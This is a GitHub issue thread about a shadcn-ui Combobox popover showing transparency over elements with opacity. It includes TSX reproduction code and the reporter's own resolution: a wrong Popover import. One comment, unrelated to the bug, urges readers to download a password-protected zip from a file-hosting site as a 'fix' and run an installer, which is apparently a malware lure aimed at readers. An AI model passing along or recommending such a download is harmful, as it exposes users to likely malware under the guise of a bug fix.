### ISSUE TITLE
[bug]: Combobox content is showing weird transparency when above elements with opacity

### ISSUE THREAD

**Issue by CombeeMike** [shadcn-ui/ui#4641]
### Describe the bug

The popover content of my expanded combobox is showing transparency but only above elements which have opacity set themselves.

Best shown with a picture:

![image](https://github.com/user-attachments/assets/7d97ff8f-d344-42d4-b429-ce303fd24ea4)

When removing the opacity from the underlying (!) elements (e.g. the submit button) they don't shine through anymore. E.g. the cancel button does not have any opacity and does not shine through whatsoever.

I searched for any kind of transparency or opacity set via CSS on any of the `PopoverContent`s DOM elements but can't find anything suspicious and I have no idea what CSS features could even lead to such behavior (only show transparency above elements which have opacity set 🤷‍♂️).

Please let me know if I can provide any more information.

### Affected component/components

Combobox

### How to reproduce

# The test cmp

```tsx
import { Button, Combobox } from 'halumi-ui';

export const TestCmp: React.FC = () => {
  const options = [
    { value: '1', name: 'Account 1' },
    { value: '2', name: 'Account 2' },
    { value: '3', name: 'Account 3' },
    { value: '4', name: 'Account 4' },
    { value: '5', name: 'Account 5' },
    { value: '6', name: 'Account 6' },
    { value: '7', name: 'Account 7' },
    { value: '8', name: 'Account 8' },
    { value: '9', name: 'Account 9' },
    { value: '10', name: 'Account 10' },
    { value: '11', name: 'Account 11' },
    { value: '12', name: 'Account 12' },
    { value: '13', name: 'Account 13' },
    { value: '14', name: 'Account 14' },
  ];

  return (
    <div className="flex flex-col gap-4">
      <Combobox options={options} value={''} />
      <Combobox options={options} value={''} />

      <Button disabled>Submit</Button>
      <Button>Cancel</Button>
    </div>
  );
};
```

# The underlying cmps

## Combobox

Pretty much c/p from [shadcn](https://ui.shadcn.com/docs/components/combobox) (first usage example), only generalized a bit:
```tsx
import { cn } from '../lib/css.utils.js';
import { Button } from './button.js';
import { Command, CommandEmpty, CommandGroup, CommandInput, CommandItem, CommandList } from './command.js';
import { Popover, PopoverContent, PopoverTrigger } from '@radix-ui/react-popover';
import { Check, ChevronsUpDown } from 'lucide-react';
import * as React from 'react';

export type ComboboxOptionValue = string;

type ComboboxOption = {
  value: ComboboxOptionValue;
  name: string;
};

export type ComboboxProps = {
  options: ComboboxOption[];
  value: ComboboxOptionValue;
  /** Text to show in certain places. E.g. `No ${subject} found}`. Defaults to `entry` if not given. */
  subject?: string;
  onChange?: (value: ComboboxOptionValue) => void;
  onBlur?: () => void;
};

export const Combobox: React.FC<ComboboxProps> = ({ options, value, subject = 'entry', onChange, onBlur }) => {
  const [open, setOpen] = React.useState(false);

  return (
    <Popover open={open} onOpenChange={setOpen}>
      <PopoverTrigger asChild onBlur={onBlur}>
        <Button variant="outline" role="combobox" aria-expanded={open} className="flex w-[280px] justify-between">
          {value ? options.find(x => x.value === value)?.name : `Select ${subject}...`}
          <ChevronsUpDown className="ml-2 h-4 w-4 shrink-0 opacity-50" />
        </Button>
      </PopoverTrigger>

      <PopoverContent className="w-[280px] p-0">
        <Command>
          <CommandInput placeholder={`Search ${subject}...`} />
          <CommandList>
            <CommandEmpty>{`No ${subject} found.`}</CommandEmpty>
            <CommandGroup>
              {options.map(x => (
                <CommandItem
                  key={x.value}
                  value={x.name}
                  onSelect={() => {
                    if (x.value !== value) {
                      onChange?.(x.value);
                    }
                    setOpen(false);
                  }}
                >
                  <Check className={cn('mr-2 h-4 w-4', value === x.value ? 'opacity-100' : 'opacity-0')} />
                  {x.name}
                </CommandItem>
              ))}
            </CommandGroup>
          </CommandList>
        </Command>
      </PopoverContent>
    </Popover>
  );
};
```

## Command, Dialog & Popover

I'm not pasting the code of those components here as they're all 100% default, created via CLI `npx shadcn-ui@latest add command` & `npx shadcn-ui@latest add popover`.

See attached project for the code.

### Codesandbox/StackBlitz link

I tried but did wasn't able to even get started with CodeSandbox or StackBlitz.

However, here's a demo project created by following the [installation steps]() outlined on the HP:
[shadcn-repro-demo.zip](https://github.com/user-attachments/files/16747994/shadcn-repro-demo.zip)

Everything is 100% default as created by the CLI. Only the `Combobox` contains a bit of generalized code (see above).

Project can be run by `npm i && npm run dev` & shows the issue right away.

### System Info

```bash
Versions of involved cmps:

- @radix-ui/react-dialog@1.1.1
- cmdk@1.0.0
- @radix-ui/react-popover@1.1.1
- react@18.3.1
```

### Before submitting

- [X] I've made research efforts and searched the documentation
- [X] I've searched for existing issues

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CombeeMike** [comment]
Whilst uploading a runnable repro demo, I found the issue:

In my `Combobox.tsx` I was importing `Popover`, `PopoverContent` & `PopoverTrigger` from `@radix-ui/react-popover` instead of my own `popover.tsx` 🙈.
